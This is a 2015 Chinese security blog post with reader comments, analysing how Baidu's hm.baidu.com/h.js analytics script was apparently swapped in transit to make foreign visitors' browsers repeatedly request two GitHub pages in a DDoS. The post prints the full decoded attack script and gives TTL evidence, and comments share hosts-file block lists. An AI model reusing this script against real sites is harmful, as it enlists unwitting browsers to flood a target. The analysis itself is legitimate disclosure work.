<main class="main-container ng-scope" ng-view=""><div class="main receptacle post-view ng-scope"><article class="entry ng-scope" ng-controller="EntryCtrl" ui-lightbox=""><header><h1 class="entry-title ng-binding">百度统计js被劫持用来DDOS Github</h1><div class="entry-meta"><a target="_blank" class="author name ng-binding">insight-labs</a> <span class="bull">·</span> <time title="2015/03/27 14:07" ui-time="" datetime="2015/03/27 14:07" class="published ng-binding ng-isolate-scope">2015/03/27 14:07</time></div></header><section class="entry-content ng-binding" ng-bind-html="postContentTrustedHtml"><p></p><h2>0x00 背景</h2><hr><p>今天中午刷着全国最大的信息安全从业人员同性交友社区zone.wooyun.org的时候，忽然浏览器每隔2秒就不断的弹窗：</p><pre><code>malicious javascript detected on this domain
</code></pre><p><img alt="enter image description here" img-src="b574faa3173f58b7bc9d5beb03f6ccf37c68f060.jpg"></p><p>我第一反应就是不知道哪个调皮的基友又把zone给XSS了，马上打开开发者工具分析。</p><h2>0x01 细节</h2><hr><p>之后立刻发现弹窗的js居然是从github加载的：</p><p><img alt="enter image description here" img-src="74e15e0b19b6f40eb95a3876f7e6d28d0fb2eb87.jpg"></p><p>可是为什么乌云会从github加载js呢，并且还是从greatfire和纽约时报镜像加载。</p><p>第一反应是页面有xss或者js被劫持了，找了半天终于找到了，居然是</p><pre><code>hm.baidu.com/h.js
</code></pre><p>这个js的确被乌云加载了没错，这是百度统计的js代码，打开后里面是一个简单加密后的js，eval了一串编码后的内容，随便找了个在线解密看了下，发现如下内容:</p><pre><code>#!js
document.write("&lt;script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'&gt;\x3c/script&gt;");
!window.jQuery &amp;&amp; document.write("&lt;script src='http://code.jquery.com/jquery-latest.js'&gt;\x3c/script&gt;");
startime = (new Date).getTime();
var count = 0;

function unixtime() {
    var a = new Date;
    return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
}
url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];
NUM = url_array.length;

function r_send2() {
    var a = unixtime() % NUM;
    get(url_array[a])
}

function get(a) {
    var b;
    $.ajax({
        url: a,
        dataType: "script",
        timeout: 1E4,
        cache: !0,
        beforeSend: function() {
            requestTime = (new Date).getTime()
        },
        complete: function() {
            responseTime = (new Date).getTime();
            b = Math.floor(responseTime - requestTime);
            3E5 &gt; responseTime - startime &amp;&amp; (r_send(b), count += 1)
        }
    })
}

function r_send(a) {
    setTimeout("r_send2()", a)
}
setTimeout("r_send2()", 2E3);
</code></pre><p>大概功能就是关闭缓存后每隔2秒加载一次</p><pre><code>url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];
</code></pre><p>里面的两个url</p><p>问了下墙内的小伙伴们，他们看到的js都是正常的，但是通过墙外ip访问</p><pre><code>http://hm.baidu.com/h.js
</code></pre><p>就会得到上面的js文件，每隔2秒请求一下这两个url。</p><p>打开twitter看了下，似乎从3月18号以来Github就受到了DDoS攻击，之后greatfire把被攻击的页面内容换成了</p><pre><code>#!js
alert("WARNING: malicious javascript detected on this domain")
</code></pre><p>以弹窗的方式阻止了js的循环执行。</p><p><img alt="enter image description here" img-src="358f02154d284f92dfec3593fa6b898f17195fa7.jpg"></p><p>图3 国外ip traceroute到hm.baidu.com的记录</p><p>似乎DNS并没有被劫持，看来是像之前一样直接把IP劫持了或者直接在HTTP协议里替换文件。</p><p><img alt="enter image description here" img-src="e46036a9cc01ece360fda26095cd4c9d2ab57e3d.jpg"></p><p>扫了下端口，只开了80和443，通过https协议访问后是正常的空页面(只有带referer才会出现js文件)。</p><p><img alt="enter image description here" img-src="ffd500f879953a80b247e7ea304bb3c1ce8918ea.jpg"></p><p>作者要进行抓包分析时劫持已经停止，在<a href="https://twitter.com/mac_zhou/status/581324446058713088">twitter</a>上看到有人已经分析过引用如下：</p><blockquote><p>抓包跟踪，正常百度服务器返回给我日本VPS的TTL为51， RESP返回HTTP 200 OK的报文的TTL是47，可以确定的是有中间设备对VPS发了伪造报文。</p></blockquote><p><img alt="enter image description here" img-src="4193acfe89378cc646cbb617efeba7e008627491.jpg"></p><p>真是无耻，呵呵</p><p>忽然想起一句话,之前DNS被劫持到外国服务器的时候某站长说的:</p><pre><code>They have weaponized their entire population.
</code></pre><p>现在应该是:</p><pre><code>They have weaponized their entire population of the Earth.
</code></pre><p></p></section></article><div class="entry-controls clearfix"><div style="float:left;color:#9d9e9f;font-size:15px"><span>&copy;乌云知识库版权所有 未经许可 禁止转载</span></div></div><div class="yarpp-related"><h3>为您推荐了适合您的技术文章:</h3><ol id="recommandsystem"><li><a href="http://drops.wooyun.org/papers/6043" rel="bookmark" id="re1">对github的中间人攻击</a></li><li><a href="http://drops.wooyun.org/web/13009" rel="bookmark" id="re2">前端防御XSS</a></li><li><a href="http://drops.wooyun.org/tips/8594" rel="bookmark" id="re3">工控安全入门分析</a></li><li><a href="http://drops.wooyun.org/papers/6630" rel="bookmark" id="re4">JSONP挖掘与高级利用</a></li></ol></div><div id="comments" class="comment-list clearfix"><div id="comment-list"><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">威霸总代理</span> <span class="reply-time">2016-06-22 19:00:09</span></div><p></p><p>顶！www.viper-china.net</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">haitaowuyun</span> <span class="reply-time">2015-04-08 14:17:08</span></div><p></p><p>逗死我了,&quot;杀得好&quot;,&quot;大国博弈&quot;<br>大国,呵呵</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">呵呵</span> <span class="reply-time">2015-04-05 23:03:36</span></div><p></p><p>你不关心政治 政治就来关心你<br>呵呵，等你被政治关心之后就不这么说了<br>naive</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Dr. What</span> <span class="reply-time">2015-04-05 11:52:17</span></div><p></p><p>有道理，这么说来……中国大陆人人都是斯诺登？因为龌龊的事情大家全都知道了啊。大概类似棱镜的事件在中国就算发生也根本没什么影响，因为所有人都只会觉得，“哦，我被监控了？这不是很正常的嘛，一直如此大家都知道啊。”</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">随便吧</span> <span class="reply-time">2015-04-05 06:33:44</span></div><p></p><p>政治本来就是肮脏的，大国博弈更是黑暗无边，层主真是幼稚到可笑。</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">随便吧</span> <span class="reply-time">2015-04-05 06:32:20</span></div><p></p><p>龌龊的事情让你听过，那你可以媲美斯诺登了。</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">呵呵</span> <span class="reply-time">2015-04-05 05:37:42</span></div><p></p><p>呵呵，还“杀得好”？你和ISIS有什么区别？匪狗</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">insight-labs</span> <span class="reply-time">2015-04-04 19:40:49</span></div><p></p><p>至少我没听说过github谷歌微软把他们的流量劫持了ddos别人……</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">insight-labs</span> <span class="reply-time">2015-04-04 19:40:14</span></div><p></p><p>证据在这里:<br>http://www.netresec.com/?page=Blog&amp;month=2015-03&amp;post=China%27s-Man-on-the-Side-Attack-on-GitHub</p><p>http://blog.erratasec.com/2015/04/pin-pointing-chinas-attack-against.html</p><p>从1开始递增检测数据包的ttl，当经过中国网通主干路由器的时候出现了伪造的返回包。</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">探狗</span> <span class="reply-time">2015-04-04 16:35:25</span></div><p></p><p>Github和谷歌微软也不要装什么逼 ，棱镜门也有他们的份。要真扯出来 ，谁的屁股都不干净。</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">尼玛</span> <span class="reply-time">2015-04-04 15:33:46</span></div><p></p><p>真心看了楼上的内容，证据真的不足,谁能给一个令人信服的证据呢？</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">sisige</span> <span class="reply-time">2015-04-04 12:50:41</span></div><p></p><p>现在看来杀得好</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">sigh</span> <span class="reply-time">2015-04-04 10:17:19</span></div><p></p><p>請問如果從chrome裡把所有來自baidu.com的javascript都不允許執行的話，能解決這個問題嗎?　我想看百度的某些東西但又不想被用作攻擊他的工具。</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">坑爹工人</span> <span class="reply-time">2015-04-04 07:11:56</span></div><p></p><p>md. 从现在开始，我只用 Tor 看中国网站</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">坑爹工人</span> <span class="reply-time">2015-04-04 07:07:33</span></div><p></p><p>临时的解决办法是 drivers/etc/.hosts 添加以下</p><p>＃GFW DDoS<br>127.0.0.1 hm.baidu.com<br>127.0.0.1 pos.baidu.com<br>127.0.0.1 cbjs.baidu.com<br>127.0.0.1 dup.baidustatic.com<br>127.0.0.1 eclick.baidu.com<br>127.0.0.1 cpro.baidu.com</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">求问</span> <span class="reply-time">2015-04-04 05:32:56</span></div><p></p><p>求问是怎么定位到这个js的</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">kleenex</span> <span class="reply-time">2015-04-04 03:05:32</span></div><p></p><p>chrome有禁用js的插件Quick Javascript Switcher<br>但是用了以后基本网页也没法看了QAQ</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">T0ne5</span> <span class="reply-time">2015-04-02 11:43:01</span></div><p></p><p>请跟我到有关部门走一趟。</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">麻痹GFW</span> <span class="reply-time">2015-04-02 04:06:07</span></div><p></p><p>不管用。。。</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Rykiex</span> <span class="reply-time">2015-04-01 12:10:52</span></div><p></p><p>太坑爹了~這幾天上好多網站都這樣子，根本不能正常瀏覽，又不能禁用JS~</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">an9</span> <span class="reply-time">2015-03-31 18:58:58</span></div><p></p><p>我就来看看。</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">wefgod</span> <span class="reply-time">2015-03-31 09:57:27</span></div><p></p><p>TTL变了，说明比原来多跳了几次</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">flyfish</span> <span class="reply-time">2015-03-31 04:25:53</span></div><p></p><p>咱们工人有力量。</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">呵呵</span> <span class="reply-time">2015-03-31 03:34:53</span></div><p></p><p>呵呵，土共什么事做不出来？89年那次邓小平那sb连“杀20万人保20年政权”这话都说的出来、搞ddos又算个锤子？</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">黑蛋</span> <span class="reply-time">2015-03-30 23:50:41</span></div><p></p><p>虐过</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">感觉在这里说话的都会被水表</span> <span class="reply-time">2015-03-30 21:54:48</span></div><p></p><p>GF只不过是一次一次的突破下限。<br>某天改到帝制我也不会惊讶的<br>~~帝制才能更好的实现共产主义~~</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">merito</span> <span class="reply-time">2015-03-30 20:08:51</span></div><p></p><p>感觉像个笑话……</p><p>话说这文居然没被公关啊</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">baidu</span> <span class="reply-time">2015-03-30 17:03:56</span></div><p></p><p>We are currently experiencing the largest DDoS (distributed denial of service) attack in github.com&#039;s history. March 28, 2015</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">牛</span> <span class="reply-time">2015-03-30 14:22:40</span></div><p></p><p>应该能找到那个 人 .</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">tutugreen</span> <span class="reply-time">2015-03-30 01:43:29</span></div><p></p><p>+1</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">張旭</span> <span class="reply-time">2015-03-29 21:02:30</span></div><p></p><p>太扯了 ....<br>GFW 真是無極限 ...</p><p>這真的很可怕。<br>這是怎麼樣的一個政府組織 .... 噁心。</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">匿了吧还是</span> <span class="reply-time">2015-03-29 20:39:23</span></div><p></p><p>难道IP不是无连接的么，TTL改变不说明问题啊。</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">昵称</span> <span class="reply-time">2015-03-29 17:41:02</span></div><p></p><p>突然想到索尼被黑的事</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">soloman</span> <span class="reply-time">2015-03-29 16:29:51</span></div><p></p><p>其实我很想知道，做这个事情到底图啥？显然不可能是把这些文件从地球上抹去，那么目的是什么呢？威胁github老实点？</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">microsniper</span> <span class="reply-time">2015-03-29 15:33:28</span></div><p></p><p>客官要喝点什么茶</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">xzwj</span> <span class="reply-time">2015-03-29 13:54:48</span></div><p></p><p>维基百科</p><p>中国大陆<br>2013年1月20日，中國大陸政府的防火長城利用域名污染和關鍵詞過濾等手段封鎖GitHub，令中國大陸的用戶無法直接進入。此前，针对中华人民共和国铁道部售票网站12306的抢票插件曾经不合理引用了存储在GitHub上的js文件（死循环重试），导致GitHub伺服器的速度大幅降低。後来插件的作者將該JavaScript文件轉移到其他網站。針對政府對GitHub的封鎖行動，知名人士李开复在新浪微博貼文抗議，迅速引起網民的關注，該訊息更在三小時内被轉發逾3萬2千次。2013年1月23日，GitHub被解封，事件平息。</p><p>2013年1月26日，有中国大陆的用户在访问GitHub时发现证书无效，经检查发现，GitHub的证书变为了一自签署的X.509证书，生成时间为2013年1月25日14时29分12秒，有效期一年，故有人推测GitHub疑似遭到了中间人攻击。攻击持续了约一个小时后停止，访问恢复正常。</p><p>DDoS攻擊[编辑]<br>GitHub在其官方Twitter账号表示，从2015年3月26日起遭到了超过24小时的持续DDoS攻击。GitHub称这次攻击是GitHub历史上最严重的一次DDoS攻击。第三方研究者指出，此次攻击采用了HTTP劫持，百度统计的脚本文件被中间人植入了攻击GitHub的代码，其功能是每隔2秒加载一次某GitHub页面。百度已否认自身产品存在安全问题。这次攻击导致GitHub在全球范围内的访问速度下降。3月28日起，GitHub在中国大陆十分不稳定，多数情况下无法访问。</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">小樱</span> <span class="reply-time">2015-03-29 01:23:37</span></div><p></p><p>路过围观。。。什么鬼</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">depycode</span> <span class="reply-time">2015-03-28 22:31:24</span></div><p></p><p>黑阔</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">sin</span> <span class="reply-time">2015-03-28 21:11:47</span></div><p></p><p>我擦,,,,搞得我来回切换火狐chrome.还重启了几次机</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">f4ckbaidu</span> <span class="reply-time">2015-03-28 18:39:02</span></div><p></p><p>用comodo website filtering干掉所有百度域名+翻墙的表示无压力</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">vvtommy</span> <span class="reply-time">2015-03-28 15:46:44</span></div><p></p><p>这就真的是劫持了…</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">hehehehehe</span> <span class="reply-time">2015-03-28 14:41:37</span></div><p></p><p>应该将alert换成<br>window.location.href = &quot;https://github.com/greatfire/&quot;;<br>让大家都看看。</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">不填说不了话</span> <span class="reply-time">2015-03-28 13:28:28</span></div><p></p><p>那啥，百度快找公关删帖</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">tutugreen</span> <span class="reply-time">2015-03-28 10:50:36</span></div><p></p><p>额，我就说怎么gf的页面写被ddos了。</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">红帽子</span> <span class="reply-time">2015-03-28 10:34:29</span></div><p></p><p>咱们工人有力量！</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">github</span> <span class="reply-time">2015-03-28 09:54:06</span></div><p></p><p>We are currently experiencing the largest DDoS (distributed denial of service) attack in github.com&#039;s history. March 28, 2015</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">504ConnectionReset</span> <span class="reply-time">2015-03-28 01:40:08</span></div><p></p><p>Search &quot;.baidu.com&quot; (54 hits in 1 file)<br>C:\Windows\System32\drivers\etc\hosts (54 hits)<br>Line 3386: 127.0.0.1	m1.baidu.com<br>Line 3387: 127.0.0.1	mobads.baidu.com<br>Line 3388: 127.0.0.1	mpro.baidu.com<br>Line 3389: 127.0.0.1	mobads-logs.baidu.com<br>Line 3390: 127.0.0.1	dl.client.baidu.com<br>Line 3391: 127.0.0.1	a.baidu.com<br>Line 3392: 127.0.0.1	wm.baidu.com<br>Line 3393: 127.0.0.1	adm.baidu.com<br>Line 3394: 127.0.0.1	baidutv.baidu.com<br>Line 3395: 127.0.0.1	banlv.baidu.com<br>Line 3396: 127.0.0.1	bar.baidu.com<br>Line 3397: 127.0.0.1	c.baidu.com<br>Line 3398: 127.0.0.1	cb.baidu.com<br>Line 3399: 127.0.0.1	cbjs.baidu.com<br>Line 3400: 127.0.0.1	cjhq.baidu.com<br>Line 3401: 127.0.0.1	cpro.baidu.com<br>Line 3402: 127.0.0.1	drmcmm.baidu.com<br>Line 3403: 127.0.0.1	dzl.baidu.com<br>Line 3404: 127.0.0.1	e.baidu.com<br>Line 3405: 127.0.0.1	eiv.baidu.com<br>Line 3406: 127.0.0.1	gimg.baidu.com<br>Line 3407: 127.0.0.1	guanjia.baidu.com<br>Line 3408: 127.0.0.1	hc.baidu.com<br>Line 3409: 127.0.0.1	hm.baidu.com<br>Line 3410: 127.0.0.1	iebar.baidu.com<br>Line 3411: 127.0.0.1	ikcode.baidu.com<br>Line 3412: 127.0.0.1	ma.baidu.com<br>Line 3413: 127.0.0.1	neirong.baidu.com<br>Line 3414: 127.0.0.1	nsclick.baidu.com<br>Line 3415: 127.0.0.1	pos.baidu.com<br>Line 3416: 127.0.0.1	s.baidu.com<br>Line 3417: 127.0.0.1	sobar.baidu.com<br>Line 3418: 127.0.0.1	sobartop.baidu.com<br>Line 3419: 127.0.0.1	spcode.baidu.com<br>Line 3420: 127.0.0.1	tk.baidu.com<br>Line 3421: 127.0.0.1	tkweb.baidu.com<br>Line 3422: 127.0.0.1	tongji.baidu.com<br>Line 3423: 127.0.0.1	toolbar.baidu.com<br>Line 3424: 127.0.0.1	tracker.baidu.com<br>Line 3425: 127.0.0.1	ucstat.baidu.com<br>Line 3426: 127.0.0.1	ulic.baidu.com<br>Line 3427: 127.0.0.1	union.baidu.com<br>Line 3428: 127.0.0.1	unstat.baidu.com<br>Line 3429: 127.0.0.1	utility.baidu.com<br>Line 3430: 127.0.0.1	utk.baidu.com<br>Line 3431: 127.0.0.1	wangmeng.baidu.com<br>Line 10372: 127.0.0.1	www.baidu.com.t2.70e.com<br>Line 22776: 127.0.0.1	a.baidu.com<br>Line 22777: 127.0.0.1	cb.baidu.com<br>Line 22778: 127.0.0.1	drmcmm.baidu.com<br>Line 22779: 127.0.0.1	cpro.baidu.com<br>Line 22791: 127.0.0.1	c.baidu.com<br>Line 22792: 127.0.0.1	hm.baidu.com<br>Line 22850: 127.0.0.1	www.baidu.com</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">暗羽</span> <span class="reply-time">2015-03-27 21:51:04</span></div><p></p><p>咱们工人有力量！</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">爱上平顶山</span> <span class="reply-time">2015-03-27 21:08:06</span></div><p></p><p>赞</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">水泥中的鱼</span> <span class="reply-time">2015-03-27 20:41:02</span></div><p></p><p>当时第一反应</p><p>127.0.0.1 hm.baidu.com</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Winck</span> <span class="reply-time">2015-03-27 20:25:11</span></div><p></p><p>访问全国最大的信息安全从业人员同性交友社区 结果导致了对 全世界最大的程序员通行交友社区 进行了攻击，这是为什么呢。。LZ带你走近科学</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">KHG</span> <span class="reply-time">2015-03-27 19:54:53</span></div><p></p><p>没有攻击它们主站，而是DDoS它们用的云服务。这种企图劫持正常流量的网络威胁，我们来起个名字吧？</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">leakless</span> <span class="reply-time">2015-03-27 19:12:01</span></div><p></p><p>咱们工人有力量~</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">浅蓝</span> <span class="reply-time">2015-03-27 18:35:28</span></div><p></p><p>咱们工人有力量</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Knight</span> <span class="reply-time">2015-03-27 17:48:15</span></div><p></p><p>靠！</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">est</span> <span class="reply-time">2015-03-27 17:32:57</span></div><p></p><p>hahahahahahahaha</p><p>这又是哪个部门中专生搞的啊？</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">leetom</span> <span class="reply-time">2015-03-27 16:03:23</span></div><p></p><p>我还专门在stackexchange上提问了。<br>为啥要搞鬼，什么怨什么仇？</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">dangge</span> <span class="reply-time">2015-03-27 15:39:25</span></div><p></p><p>我喜欢上的网站都是同性交友社区……<br>泪目……</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">加肥了的猫</span> <span class="reply-time">2015-03-27 15:39:05</span></div><p></p><p>我大功夫网千秋万代，一统江湖！</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">xsser</span> <span class="reply-time">2015-03-27 15:21:29</span></div><p></p><p>13点20也弹了.. 楼主出手真快</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">YAOSHUO</span> <span class="reply-time">2015-03-27 15:19:50</span></div><p></p><p>功夫网和百度都是某某部门的..</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">同性交友社区</span> <span class="reply-time">2015-03-27 15:07:45</span></div><p></p><p>They have weaponized their entire population.</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">xi4ohz</span> <span class="reply-time">2015-03-27 15:02:29</span></div><p></p><p>咱们工人有力量！</p><p></p></div></div><div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">ooxxcc</span> <span class="reply-time">2015-03-27 14:46:01</span></div><p></p><p>访问全国最大的信息安全从业人员同性交友社区 结果导致了对 全世界最大的程序员通行交友社区 进行了攻击，这是为什么呢。。LZ带你走近科学</p><p></p></div></div><div 